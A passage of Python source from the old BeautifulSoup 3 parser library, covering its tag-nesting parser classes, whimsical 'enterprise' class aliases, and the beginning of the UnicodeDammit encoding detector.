matchAgainst.search(markup)\n            elif hasattr(matchAgainst, '__iter__'): # list-like\n                result = markup in matchAgainst\n            elif hasattr(matchAgainst, 'items'):\n                result = markup.has_key(matchAgainst)\n            elif matchAgainst and isinstance(markup, basestring):\n                if isinstance(markup, text_type):\n                    matchAgainst = text_type(matchAgainst)\n                else:\n                    matchAgainst = str(matchAgainst)\n\n            if not result:\n                result = matchAgainst == markup\n        return result\n\nclass ResultSet(list):\n    \"\"\"A ResultSet is just a list that keeps track of the SoupStrainer\n    that created it.\"\"\"\n    def __init__(self, source):\n        list.__init__([])\n        self.source = source\n\n# Now, some helper functions.\n\ndef buildTagMap(default, *args):\n    \"\"\"Turns a list of maps, lists, or scalars into a single map.\n    Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and\n    NESTING_RESET_TAGS maps out of lists and partial maps.\"\"\"\n    built = {}\n    for portion in args:\n        if hasattr(portion, 'items'):\n            #It's a map. Merge it.\n            for k,v in portion.items():\n                built[k] = v\n        elif hasattr(portion, '__iter__'): # is a list\n            #It's a list. Map each item to the default.\n            for k in portion:\n                built[k] = default\n        else:\n            #It's a scalar. Map it to the default.\n            built[portion] = default\n    return built\n\n# Now, the parser classes.\n\nclass BeautifulStoneSoup(Tag, sgmllib.SGMLParser):\n\n    \"\"\"This class contains the basic parser and search code. It defines\n    a parser that knows nothing about tag behavior except for the\n    following:\n\n      You can't close a tag without closing all the tags it encloses.\n      That is, \"<foo><bar></foo>\" actually means\n      \"<foo><bar></bar></foo>\".\n\n    [Another possible explanation is \"<foo><bar /></foo>\", but since\n    this class defines no SELF_CLOSING_TAGS, it will never use that\n    explanation.]\n\n    This class is useful for parsing XML or made-up markup languages,\n    or when BeautifulSoup makes an assumption counter to what you were\n    expecting.\"\"\"\n\n    SELF_CLOSING_TAGS = {}\n    NESTABLE_TAGS = {}\n    RESET_NESTING_TAGS = {}\n    QUOTE_TAGS = {}\n    PRESERVE_WHITESPACE_TAGS = []\n\n    MARKUP_MASSAGE = [(re.compile(r'(<[^<>]*)/>'),\n                       lambda x: x.group(1) + ' />'),\n                      (re.compile(r'<!\\s+([^<>]*)>'),\n                       lambda x: '<!' + x.group(1) + '>')\n                      ]\n\n    ROOT_TAG_NAME = u'[document]'\n\n    HTML_ENTITIES = \"html\"\n    XML_ENTITIES = \"xml\"\n    XHTML_ENTITIES = \"xhtml\"\n    # TODO: This only exists for backwards-compatibility\n    ALL_ENTITIES = XHTML_ENTITIES\n\n    # Used when determining whether a text node is all whitespace and\n    # can be replaced with a single space. A text node that contains\n    # fancy Unicode spaces (usually non-breaking) should be left\n    # alone.\n    STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, }\n\n    def __init__(self, markup=\"\", parseOnlyThese=None, fromEncoding=None,\n                 markupMassage=True, smartQuotesTo=XML_ENTITIES,\n                 convertEntities=None, selfClosingTags=None, isHTML=False):\n        \"\"\"The Soup object is initialized as the 'root tag', and the\n        provided markup (which can be a string or a file-like object)\n        is fed into the underlying parser.\n\n        sgmllib will process most bad HTML, and the BeautifulSoup\n        class has some tricks for dealing with some HTML that kills\n        sgmllib, but Beautiful Soup can nonetheless choke or lose data\n        if your data uses self-closing tags or declarations\n        incorrectly.\n\n        By default, Beautiful Soup uses regexes to sanitize input,\n        avoiding the vast majority of these problems. If the problems\n        don't apply to you, pass in False for markupMassage, and\n        you'll get better performance.\n\n        The default parser massage techniques fix the two most common\n        instances of invalid HTML that choke sgmllib:\n\n         <br/> (No space between name of closing tag and tag close)\n         <! --Comment--> (Extraneous whitespace in declaration)\n\n        You can pass in a custom list of (RE object, replace method)\n        tuples to get Beautiful Soup to scrub your input the way you\n        want.\"\"\"\n\n        self.parseOnlyThese = parseOnlyThese\n        self.fromEncoding = fromEncoding\n        self.smartQuotesTo = smartQuotesTo\n        self.convertEntities = convertEntities\n        # Set the rules for how we'll deal with the entities we\n        # encounter\n        if self.convertEntities:\n            # It doesn't make sense to convert encoded characters to\n            # entities even while you're converting entities to Unicode.\n            # Just convert it all to Unicode.\n            self.smartQuotesTo = None\n            if convertEntities == self.HTML_ENTITIES:\n                self.convertXMLEntities = False\n                self.convertHTMLEntities = True\n                self.escapeUnrecognizedEntities = True\n            elif convertEntities == self.XHTML_ENTITIES:\n                self.convertXMLEntities = True\n                self.convertHTMLEntities = True\n                self.escapeUnrecognizedEntities = False\n            elif convertEntities == self.XML_ENTITIES:\n                self.convertXMLEntities = True\n                self.convertHTMLEntities = False\n                self.escapeUnrecognizedEntities = False\n        else:\n            self.convertXMLEntities = False\n            self.convertHTMLEntities = False\n            self.escapeUnrecognizedEntities = False\n\n        self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)\n        sgmllib.SGMLParser.__init__(self)\n\n        if hasattr(markup, 'read'):        # It's a file-type object.\n            markup = markup.read()\n        self.markup = markup\n        self.markupMassage = markupMassage\n        try:\n            self._feed(isHTML=isHTML)\n        except StopParsing:\n            pass\n        self.markup = None                 # The markup can now be GCed\n\n    def convert_charref(self, name):\n        \"\"\"This method fixes a bug in Python's SGMLParser.\"\"\"\n        try:\n            n = int(name)\n        except ValueError:\n            return\n        if not 0 <= n <= 127 : # ASCII ends at 127, not 255\n            return\n        return self.convert_codepoint(n)\n\n    def _feed(self, inDocumentEncoding=None, isHTML=False):\n        # Convert the document to Unicode.\n        markup = self.markup\n        if isinstance(markup, text_type):\n            if not hasattr(self, 'originalEncoding'):\n                self.originalEncoding = None\n        else:\n            dammit = UnicodeDammit\\\n                     (markup, [self.fromEncoding, inDocumentEncoding],\n                      smartQuotesTo=self.smartQuotesTo, isHTML=isHTML)\n            markup = dammit.unicode\n            self.originalEncoding = dammit.originalEncoding\n            self.declaredHTMLEncoding = dammit.declaredHTMLEncoding\n        if markup:\n            if self.markupMassage:\n                if not hasattr(self.markupMassage, \"__iter__\"):\n                    self.markupMassage = self.MARKUP_MASSAGE\n                for fix, m in self.markupMassage:\n                    markup = fix.sub(m, markup)\n                # TODO: We get rid of markupMassage so that the\n                # soup object can be deepcopied later on. Some\n                # Python installations can't copy regexes. If anyone\n                # was relying on the existence of markupMassage, this\n                # might cause problems.\n                del(self.markupMassage)\n        self.reset()\n\n        sgmllib.SGMLParser.feed(self, markup)\n        # Close out any unfinished strings and close all the open tags.\n        self.endData()\n        while self.currentTag.name != self.ROOT_TAG_NAME:\n            self.popTag()\n\n    def __getattr__(self, methodName):\n        \"\"\"This method routes method call requests to either the SGMLParser\n        superclass or the Tag superclass, depending on the method name.\"\"\"\n        #print \"__getattr__ called on %s.%s\" % (self.__class__, methodName)\n\n        if methodName.startswith('start_') or methodName.startswith('end_') \\\n               or methodName.startswith('do_'):\n            return sgmllib.SGMLParser.__getattr__(self, methodName)\n        elif not methodName.startswith('__'):\n            return Tag.__getattr__(self, methodName)\n        else:\n            raise AttributeError\n\n    def isSelfClosingTag(self, name):\n        \"\"\"Returns true iff the given string is the name of a\n        self-closing tag according to this parser.\"\"\"\n        return name in self.SELF_CLOSING_TAGS \\\n               or name in self.instanceSelfClosingTags\n\n    def reset(self):\n        Tag.__init__(self, self, self.ROOT_TAG_NAME)\n        self.hidden = 1\n        sgmllib.SGMLParser.reset(self)\n        self.currentData = []\n        self.currentTag = None\n        self.tagStack = []\n        self.quoteStack = []\n        self.pushTag(self)\n\n    def popTag(self):\n        tag = self.tagStack.pop()\n\n        #print \"Pop\", tag.name\n        if self.tagStack:\n            self.currentTag = self.tagStack[-1]\n        return self.currentTag\n\n    def pushTag(self, tag):\n        #print \"Push\", tag.name\n        if self.currentTag:\n            self.currentTag.contents.append(tag)\n        self.tagStack.append(tag)\n        self.currentTag = self.tagStack[-1]\n\n    def endData(self, containerClass=NavigableString):\n        if self.currentData:\n            currentData = u''.join(self.currentData)\n            if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and\n                not set([tag.name for tag in self.tagStack]).intersection(\n                    self.PRESERVE_WHITESPACE_TAGS)):\n                if '\\n' in currentData:\n                    currentData = '\\n'\n                else:\n                    currentData = ' '\n            self.currentData = []\n            if self.parseOnlyThese and len(self.tagStack) <= 1 and \\\n                   (not self.parseOnlyThese.text or \\\n                    not self.parseOnlyThese.search(currentData)):\n                return\n            o = containerClass(currentData)\n            o.setup(self.currentTag, self.previous)\n            if self.previous:\n                self.previous.next = o\n            self.previous = o\n            self.currentTag.contents.append(o)\n\n\n    def _popToTag(self, name, inclusivePop=True):\n        \"\"\"Pops the tag stack up to and including the most recent\n        instance of the given tag. If inclusivePop is false, pops the tag\n        stack up to but *not* including the most recent instqance of\n        the given tag.\"\"\"\n        #print \"Popping to %s\" % name\n        if name == self.ROOT_TAG_NAME:\n            return\n\n        numPops = 0\n        mostRecentTag = None\n        for i in xrange(len(self.tagStack)-1, 0, -1):\n            if name == self.tagStack[i].name:\n                numPops = len(self.tagStack)-i\n                break\n        if not inclusivePop:\n            numPops = numPops - 1\n\n        for i in xrange(0, numPops):\n            mostRecentTag = self.popTag()\n        return mostRecentTag\n\n    def _smartPop(self, name):\n\n        \"\"\"We need to pop up to the previous tag of this type, unless\n        one of this tag's nesting reset triggers comes between this\n        tag and the previous tag of this type, OR unless this tag is a\n        generic nesting trigger and another generic nesting trigger\n        comes between this tag and the previous tag of this type.\n\n        Examples:\n         <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'.\n         <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'.\n         <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'.\n\n         <li><ul><li> *<li>* should pop to 'ul', not the first 'li'.\n         <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'\n         <td><tr><td> *<td>* should pop to 'tr', not the first 'td'\n        \"\"\"\n\n        nestingResetTriggers = self.NESTABLE_TAGS.get(name)\n        isNestable = nestingResetTriggers != None\n        isResetNesting = name in self.RESET_NESTING_TAGS\n        popTo = None\n        inclusive = True\n        for i in xrange(len(self.tagStack)-1, 0, -1):\n            p = self.tagStack[i]\n            if (not p or p.name == name) and not isNestable:\n                #Non-nestable tags get popped to the top or to their\n                #last occurance.\n                popTo = name\n                break\n            if (nestingResetTriggers is not None\n                and p.name in nestingResetTriggers) \\\n                or (nestingResetTriggers is None and isResetNesting\n                    and p.name in self.RESET_NESTING_TAGS):\n\n                #If we encounter one of the nesting reset triggers\n                #peculiar to this tag, or we encounter another tag\n                #that causes nesting to reset, pop up to but not\n                #including that tag.\n                popTo = p.name\n                inclusive = False\n                break\n            p = p.parent\n        if popTo:\n            self._popToTag(popTo, inclusive)\n\n    def unknown_starttag(self, name, attrs, selfClosing=0):\n        #print \"Start tag %s: %s\" % (name, attrs)\n        if self.quoteStack:\n            #This is not a real tag.\n            #print \"<%s> is not real!\" % name\n            attrs = ''.join([' %s=\"%s\"' % (x, y) for x, y in attrs])\n            self.handle_data('<%s%s>' % (name, attrs))\n            return\n        self.endData()\n\n        if not self.isSelfClosingTag(name) and not selfClosing:\n            self._smartPop(name)\n\n        if self.parseOnlyThese and len(self.tagStack) <= 1 \\\n               and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):\n            return\n\n        tag = Tag(self, name, attrs, self.currentTag, self.previous)\n        if self.previous:\n            self.previous.next = tag\n        self.previous = tag\n        self.pushTag(tag)\n        if selfClosing or self.isSelfClosingTag(name):\n            self.popTag()\n        if name in self.QUOTE_TAGS:\n            #print \"Beginning quote (%s)\" % name\n            self.quoteStack.append(name)\n            self.literal = 1\n        return tag\n\n    def unknown_endtag(self, name):\n        #print \"End tag %s\" % name\n        if self.quoteStack and self.quoteStack[-1] != name:\n            #This is not a real end tag.\n            #print \"</%s> is not real!\" % name\n            self.handle_data('</%s>' % name)\n            return\n        self.endData()\n        self._popToTag(name)\n        if self.quoteStack and self.quoteStack[-1] == name:\n            self.quoteStack.pop()\n            self.literal = (len(self.quoteStack) > 0)\n\n    def handle_data(self, data):\n        self.currentData.append(data)\n\n    def _toStringSubclass(self, text, subclass):\n        \"\"\"Adds a certain piece of text to the tree as a NavigableString\n        subclass.\"\"\"\n        self.endData()\n        self.handle_data(text)\n        self.endData(subclass)\n\n    def handle_pi(self, text):\n        \"\"\"Handle a processing instruction as a ProcessingInstruction\n        object, possibly one with a %SOUP-ENCODING% slot into which an\n        encoding will be plugged later.\"\"\"\n        if text[:3] == \"xml\":\n            text = u\"xml version='1.0' encoding='%SOUP-ENCODING%'\"\n        self._toStringSubclass(text, ProcessingInstruction)\n\n    def handle_comment(self, text):\n        \"Handle comments as Comment objects.\"\n        self._toStringSubclass(text, Comment)\n\n    def handle_charref(self, ref):\n        \"Handle character references as data.\"\n        if self.convertEntities:\n            data = unichr(int(ref))\n        else:\n            data = '&#%s;' % ref\n        self.handle_data(data)\n\n    def handle_entityref(self, ref):\n        \"\"\"Handle entity references as data, possibly converting known\n        HTML and/or XML entity references to the corresponding Unicode\n        characters.\"\"\"\n        data = None\n        if self.convertHTMLEntities:\n            try:\n                data = unichr(name2codepoint[ref])\n            except KeyError:\n                pass\n\n        if not data and self.convertXMLEntities:\n                data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref)\n\n        if not data and self.convertHTMLEntities and \\\n            not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref):\n                # TODO: We've got a problem here. We're told this is\n                # an entity reference, but it's not an XML entity\n                # reference or an HTML entity reference. Nonetheless,\n                # the logical thing to do is to pass it through as an\n                # unrecognized entity reference.\n                #\n                # Except: when the input is \"&carol;\" this function\n                # will be called with input \"carol\". When the input is\n                # \"AT&T\", this function will be called with input\n                # \"T\". We have no way of knowing whether a semicolon\n                # was present originally, so we don't know whether\n                # this is an unknown entity or just a misplaced\n                # ampersand.\n                #\n                # The more common case is a misplaced ampersand, so I\n                # escape the ampersand and omit the trailing semicolon.\n                data = \"&amp;%s\" % ref\n        if not data:\n            # This case is different from the one above, because we\n            # haven't already gone through a supposedly comprehensive\n            # mapping of entities to Unicode characters. We might not\n            # have gone through any mapping at all. So the chances are\n            # very high that this is a real entity, and not a\n            # misplaced ampersand.\n            data = \"&%s;\" % ref\n        self.handle_data(data)\n\n    def handle_decl(self, data):\n        \"Handle DOCTYPEs and the like as Declaration objects.\"\n        self._toStringSubclass(data, Declaration)\n\n    def parse_declaration(self, i):\n        \"\"\"Treat a bogus SGML declaration as raw data. Treat a CDATA\n        declaration as a CData object.\"\"\"\n        j = None\n        if self.rawdata[i:i+9] == '<![CDATA[':\n             k = self.rawdata.find(']]>', i)\n             if k == -1:\n                 k = len(self.rawdata)\n             data = self.rawdata[i+9:k]\n             j = k+3\n             self._toStringSubclass(data, CData)\n        else:\n            try:\n                j = sgmllib.SGMLParser.parse_declaration(self, i)\n            except sgmllib.SGMLParseError:\n                toHandle = self.rawdata[i:]\n                self.handle_data(toHandle)\n                j = i + len(toHandle)\n        return j\n\nclass BeautifulSoup(BeautifulStoneSoup):\n\n    \"\"\"This parser knows the following facts about HTML:\n\n    * Some tags have no closing tag and should be interpreted as being\n      closed as soon as they are encountered.\n\n    * The text inside some tags (ie. 'script') may contain tags which\n      are not really part of the document and which should be parsed\n      as text, not tags. If you want to parse the text as tags, you can\n      always fetch it and parse it explicitly.\n\n    * Tag nesting rules:\n\n      Most tags can't be nested at all. For instance, the occurance of\n      a <p> tag should implicitly close the previous <p> tag.\n\n       <p>Para1<p>Para2\n        should be transformed into:\n       <p>Para1</p><p>Para2\n\n      Some tags can be nested arbitrarily. For instance, the occurance\n      of a <blockquote> tag should _not_ implicitly close the previous\n      <blockquote> tag.\n\n       Alice said: <blockquote>Bob said: <blockquote>Blah\n        should NOT be transformed into:\n       Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah\n\n      Some tags can be nested, but the nesting is reset by the\n      interposition of other tags. For instance, a <tr> tag should\n      implicitly close the previous <tr> tag within the same <table>,\n      but not close a <tr> tag in another table.\n\n       <table><tr>Blah<tr>Blah\n        should be transformed into:\n       <table><tr>Blah</tr><tr>Blah\n        but,\n       <tr>Blah<table><tr>Blah\n        should NOT be transformed into\n       <tr>Blah<table></tr><tr>Blah\n\n    Differing assumptions about tag nesting rules are a major source\n    of problems with the BeautifulSoup class. If BeautifulSoup is not\n    treating as nestable a tag your page author treats as nestable,\n    try ICantBelieveItsBeautifulSoup, MinimalSoup, or\n    BeautifulStoneSoup before writing your own subclass.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        if 'smartQuotesTo' not in kwargs:\n            kwargs['smartQuotesTo'] = self.HTML_ENTITIES\n        kwargs['isHTML'] = True\n        BeautifulStoneSoup.__init__(self, *args, **kwargs)\n\n    SELF_CLOSING_TAGS = buildTagMap(None,\n                                    ('br' , 'hr', 'input', 'img', 'meta',\n                                    'spacer', 'link', 'frame', 'base', 'col'))\n\n    PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea'])\n\n    QUOTE_TAGS = {'script' : None, 'textarea' : None}\n\n    #According to the HTML standard, each of these inline tags can\n    #contain another tag of the same type. Furthermore, it's common\n    #to actually use these tags this way.\n    NESTABLE_INLINE_TAGS = ('span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',\n                            'center')\n\n    #According to the HTML standard, these block tags can contain\n    #another tag of the same type. Furthermore, it's common\n    #to actually use these tags this way.\n    NESTABLE_BLOCK_TAGS = ('blockquote', 'div', 'fieldset', 'ins', 'del')\n\n    #Lists can contain other lists, but there are restrictions.\n    NESTABLE_LIST_TAGS = { 'ol' : [],\n                           'ul' : [],\n                           'li' : ['ul', 'ol'],\n                           'dl' : [],\n                           'dd' : ['dl'],\n                           'dt' : ['dl'] }\n\n    #Tables can contain other tables, but there are restrictions.\n    NESTABLE_TABLE_TAGS = {'table' : [],\n                           'tr' : ['table', 'tbody', 'tfoot', 'thead'],\n                           'td' : ['tr'],\n                           'th' : ['tr'],\n                           'thead' : ['table'],\n                           'tbody' : ['table'],\n                           'tfoot' : ['table'],\n                           }\n\n    NON_NESTABLE_BLOCK_TAGS = ('address', 'form', 'p', 'pre')\n\n    #If one of these tags is encountered, all tags up to the next tag of\n    #this type are popped.\n    RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',\n                                     NON_NESTABLE_BLOCK_TAGS,\n                                     NESTABLE_LIST_TAGS,\n                                     NESTABLE_TABLE_TAGS)\n\n    NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,\n                                NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)\n\n    # Used to detect the charset in a META tag; see start_meta\n    CHARSET_RE = re.compile(r\"((^|;)\\s*charset=)([^;]*)\", re.M)\n\n    def start_meta(self, attrs):\n        \"\"\"Beautiful Soup can detect a charset included in a META tag,\n        try to convert the document to that charset, and re-parse the\n        document from the beginning.\"\"\"\n        httpEquiv = None\n        contentType = None\n        contentTypeIndex = None\n        tagNeedsEncodingSubstitution = False\n\n        for i in xrange(0, len(attrs)):\n            key, value = attrs[i]\n            key = key.lower()\n            if key == 'http-equiv':\n                httpEquiv = value\n            elif key == 'content':\n                contentType = value\n                contentTypeIndex = i\n\n        if httpEquiv and contentType: # It's an interesting meta tag.\n            match = self.CHARSET_RE.search(contentType)\n            if match:\n                if (self.declaredHTMLEncoding is not None or\n                    self.originalEncoding == self.fromEncoding):\n                    # An HTML encoding was sniffed while converting\n                    # the document to Unicode, or an HTML encoding was\n                    # sniffed during a previous pass through the\n                    # document, or an encoding was specified\n                    # explicitly and it worked. Rewrite the meta tag.\n                    def rewrite(match):\n                        return match.group(1) + \"%SOUP-ENCODING%\"\n                    newAttr = self.CHARSET_RE.sub(rewrite, contentType)\n                    attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],\n                                               newAttr)\n                    tagNeedsEncodingSubstitution = True\n                else:\n                    # This is our first pass through the document.\n                    # Go through it again with the encoding information.\n                    newCharset = match.group(3)\n                    if newCharset and newCharset != self.originalEncoding:\n                        self.declaredHTMLEncoding = newCharset\n                        self._feed(self.declaredHTMLEncoding)\n                        raise StopParsing\n                    pass\n        tag = self.unknown_starttag(\"meta\", attrs)\n        if tag and tagNeedsEncodingSubstitution:\n            tag.containsSubstitutions = True\n\nclass StopParsing(Exception):\n    pass\n\nclass ICantBelieveItsBeautifulSoup(BeautifulSoup):\n\n    \"\"\"The BeautifulSoup class is oriented towards skipping over\n    common HTML errors like unclosed tags. However, sometimes it makes\n    errors of its own. For instance, consider this fragment:\n\n     <b>Foo<b>Bar</b></b>\n\n    This is perfectly valid (if bizarre) HTML. However, the\n    BeautifulSoup class will implicitly close the first b tag when it\n    encounters the second 'b'. It will think the author wrote\n    \"<b>Foo<b>Bar\", and didn't close the first 'b' tag, because\n    there's no real-world reason to bold something that's already\n    bold. When it encounters '</b></b>' it will close two more 'b'\n    tags, for a grand total of three tags closed instead of two. This\n    can throw off the rest of your document structure. The same is\n    true of a number of other tags, listed below.\n\n    It's much more common for someone to forget to close a 'b' tag\n    than to actually use nested 'b' tags, and the BeautifulSoup class\n    handles the common case. This class handles the not-co-common\n    case: where you can't believe someone wrote what they did, but\n    it's valid HTML and BeautifulSoup screwed up by assuming it\n    wouldn't be.\"\"\"\n\n    I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \\\n     ('em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',\n      'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',\n      'big')\n\n    I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ('noscript',)\n\n    NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,\n                                I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,\n                                I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)\n\nclass MinimalSoup(BeautifulSoup):\n    \"\"\"The MinimalSoup class is for parsing HTML that contains\n    pathologically bad markup. It makes no assumptions about tag\n    nesting, but it does know which tags are self-closing, that\n    <script> tags contain Javascript and should not be parsed, that\n    META tags may contain encoding information, and so on.\n\n    This also makes it better for subclassing than BeautifulStoneSoup\n    or BeautifulSoup.\"\"\"\n\n    RESET_NESTING_TAGS = buildTagMap('noscript')\n    NESTABLE_TAGS = {}\n\nclass BeautifulSOAP(BeautifulStoneSoup):\n    \"\"\"This class will push a tag with only a single string child into\n    the tag's parent as an attribute. The attribute's name is the tag\n    name, and the value is the string child. An example should give\n    the flavor of the change:\n\n    <foo><bar>baz</bar></foo>\n     =>\n    <foo bar=\"baz\"><bar>baz</bar></foo>\n\n    You can then access fooTag['bar'] instead of fooTag.barTag.string.\n\n    This is, of course, useful for scraping structures that tend to\n    use subelements instead of attributes, such as SOAP messages. Note\n    that it modifies its input, so don't print the modified version\n    out.\n\n    I'm not sure how many people really want to use this class; let me\n    know if you do. Mainly I like the name.\"\"\"\n\n    def popTag(self):\n        if len(self.tagStack) > 1:\n            tag = self.tagStack[-1]\n            parent = self.tagStack[-2]\n            parent._getAttrMap()\n            if (isinstance(tag, Tag) and len(tag.contents) == 1 and\n                isinstance(tag.contents[0], NavigableString) and\n                not parent.attrMap.has_key(tag.name)):\n                parent[tag.name] = tag.contents[0]\n        BeautifulStoneSoup.popTag(self)\n\n#Enterprise class names! It has come to our attention that some people\n#think the names of the Beautiful Soup parser classes are too silly\n#and \"unprofessional\" for use in enterprise screen-scraping. We feel\n#your pain! For such-minded folk, the Beautiful Soup Consortium And\n#All-Night Kosher Bakery recommends renaming this file to\n#\"RobustParser.py\" (or, in cases of extreme enterprisiness,\n#\"RobustParserBeanInterface.class\") and using the following\n#enterprise-friendly class aliases:\nclass RobustXMLParser(BeautifulStoneSoup):\n    pass\nclass RobustHTMLParser(BeautifulSoup):\n    pass\nclass RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):\n    pass\nclass RobustInsanelyWackAssHTMLParser(MinimalSoup):\n    pass\nclass SimplifyingSOAPParser(BeautifulSOAP):\n    pass\n\n######################################################\n#\n# Bonus library: Unicode, Dammit\n#\n# This class forces XML data into a standard format (usually to UTF-8\n# or Unicode).  It is heavily based on code from Mark Pilgrim's\n# Universal Feed Parser. It does not rewrite the XML or HTML to\n# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi\n# (XML) and BeautifulSoup.start_meta (HTML).\n\n# Autodetects character encodings.\n# Download from http://chardet.feedparser.org/\ntry:\n    import chardet\n#    import chardet.constants\n#    chardet.constants._debug = 1\nexcept ImportError:\n    chardet = None\n\n# cjkcodecs and iconv_codec make Python know about more character encodings.\n# Both are available from http://cjkpython.i18n.org/\n# They're built in if you use Python 2.4.\ntry:\n    import cjkcodecs.aliases\nexcept ImportError:\n    pass\ntry:\n    import iconv_codec\nexcept ImportError:\n    pass\n\nclass UnicodeDammit:\n    \"\"\"A class for detecting the encoding of a *ML document and\n    converting it to a Unicode string. If the source encoding is\n    windows-1252, can replace MS smart quotes with their HTML or XML\n    equivalents.\"\"\"\n\n    # This dictionary maps commonly seen values for \"charset\" in HTML\n    # meta tags to the corresponding Python codec names. It only covers\n    # values that aren't in Python's aliases and can't be determined\n    # by the heuristics in find_codec.\n    CHARSET_ALIASES = { \"macintosh\" : \"mac-roman\",\n                        \"x-sjis\" : \"shift-jis\" }\n\n    def __init__(self, markup, overrideEncodings=[],\n                 smartQuotesTo='xml', isHTML=False):\n        self.declaredHTMLEncoding = None\n        self.markup, documentEncoding, sniffedEncoding = \\\n                     self._detectEncoding(markup, isHTML)\n        self.smartQuotesTo = smartQuotesTo\n        self.triedEncodings = []\n        if markup == '' or isinstance(markup, text_type):\n            self.originalEncoding = None\n            self.unicode = text_type(markup)\n            return\n\n        u = None\n        for proposedEncoding in overrideEncodings:\n            u = self._convertFrom(proposedEncoding)\n            if u: break\n        if not u:\n            for proposedEncoding in (documentEncoding, sniffedEncoding):\n                u = self._convertFrom(proposedEncoding)\n                if u: break\n\n        # If no luck and we have auto-detection library, try that:\n        if not u and chardet and not isinstance(self.markup, text_type):\n            u = self._convertFrom(chardet.detect(self.markup)['encoding'])\n\n        # As a last resort, try utf-8 and windows-1252:\n        if not u:\n            for proposed_encoding in (\"utf-8\", \"windows-1252\"):\n                u = self._convertFrom(proposed_encoding)\n                if u: break\n\n        self.unicode = u\n        if not u: self.originalEncoding = None\n\n    def _subMSChar(self, orig):\n        \"\"\"Changes a MS smart quote character to an XML or HTML\n        entity.\"\"\"\n        sub = self.MS_CHARS.get(orig)\n        if isinstance(sub, tuple):\n            if self.smartQuotesTo == 'xml':\n                sub = '&#x%s;' % sub[1]\n            else:\n                sub = '&%s;' % sub[0]\n        return sub\n\n    def _convertFrom(self, proposed):\n        proposed = self.find_codec(proposed)\n        if not proposed or proposed in self.triedEncodings:\n            return None\n        self.triedEncodings.append(proposed)\n        markup = self.markup\n\n        # Convert smart quotes to HTML if coming from an encoding\n        # that might have them.\n        if self.smartQuotesTo and proposed.lower() in(\"windows-1252\",\n                                                      \"iso-8859-1\",\n                                                      \"iso-8859-2\"):\n            markup = re.compile(\"([\\x80-\\x9f])\").sub \\\n                     (lambda x: self._subMSChar(x.group(1)),\n                      markup)\n\n        try:\n            # print \"Trying to convert document to %s\" % proposed\n            u = self._toUnicode(markup, proposed)\n            self.markup = u\n            self.originalEncoding = proposed\n        except Exception as e:\n            # print \"That didn't work!\"\n            # print e\n            return None\n        #print \"Correct encoding: %s\" % proposed\n        return self.markup\n\n    def _toUnicode(self, data, encoding):\n        '''Given a string and its encoding, decodes the string into Unicode.\n        %encoding is a string recognized by encodings.aliases'''\n\n        # strip Byte Order Mark (if present)\n        if (len(data) >= 4) and (data[:2] == '\\xfe\\xff') \\\n               and (data[2:4] != '\\x00\\x00'):\n            encoding = 'utf-16be'\n            data = data[2:]\n        elif (len(data) >= 4) and (data[:2] == '\\xff\\xfe') \\\n                 and (data[2:4] != '\\x00\\x00'):\n            encoding = 'utf-16le'\n            data = data[2:]\n        elif data[:3] == '\\xef\\xbb\\xbf':\n            encoding = 'utf-8'\n            data = data[3:]\n        elif data[:4] == '\\x00\\x00\\xfe\\xff':\n            encoding = 'utf-32be'\n            data = data[4:]\n        elif data[:4] == '\\xff\\xfe\\x00\\x00':\n            encoding = 'utf-32le'\n            data = data[4:]\n        newdata = text_type(data, encoding)\n        return newdata\n\n    def _detectEncoding(self, xml_data, isHTML=False):\n        \"\"\"Given a document, tries to detect its XML encoding.\"\"\"\n        xml_encoding = sniffed_xml_encoding = None\n        try:\n            if xml_data[:4] == '\\x4c\\x6f\\xa7\\x94':\n                # EBCDIC\n                xml_data = self._ebcdic_to_ascii(xml_data)\n            elif xml_data[:4] == '\\x00\\x3c\\x00\\x3f':\n                # UTF-16BE\n                sniffed_xml_encoding = 'utf-16be'\n                xml_data = text_type(xml_data, 'utf-16be').encode('utf-8')\n            elif (len(xml_data) >= 4) and (xml_data[:2] == '\\xfe\\xff') \\\n                     and (xml_data[2:4] != '\\x00\\x00'):\n                # UTF-16BE with BOM\n                sniffed_xml_encoding = 'utf-16be'\n                xml_data = text_type(xml_data[2:], 'utf-16be').encode('utf-8')\n            elif xml_data[:4] == '\\x3c\\x00\\x3f\\x00':\n                # UTF-16LE\n                sniffed_xml_encoding = 'utf-16le'\n                xml_data = text_type(xml_data, 'utf-16le').encode('utf-8')\n            elif (len(xml_data) >= 4) and (xml_data[:2] == '\\xff\\xfe') and \\\n                     (xml_data[2:4] != '\\x00\\x00'):\n                # UTF-16LE with BOM\n                sniffed_xml_encoding = 'utf-16le'\n                xml_data = text_type(xml_data[2:], 'utf-16le').encode('utf-8')\n            elif xml_data[:4] == '\\x00\\x00\\x00\\x3c':\n                # UTF-32BE\n                sniffed_xml_encoding = 'utf-32be'\n                xml_data = text_type(xml_data, 'utf-32be').encode('utf-8')\n            elif 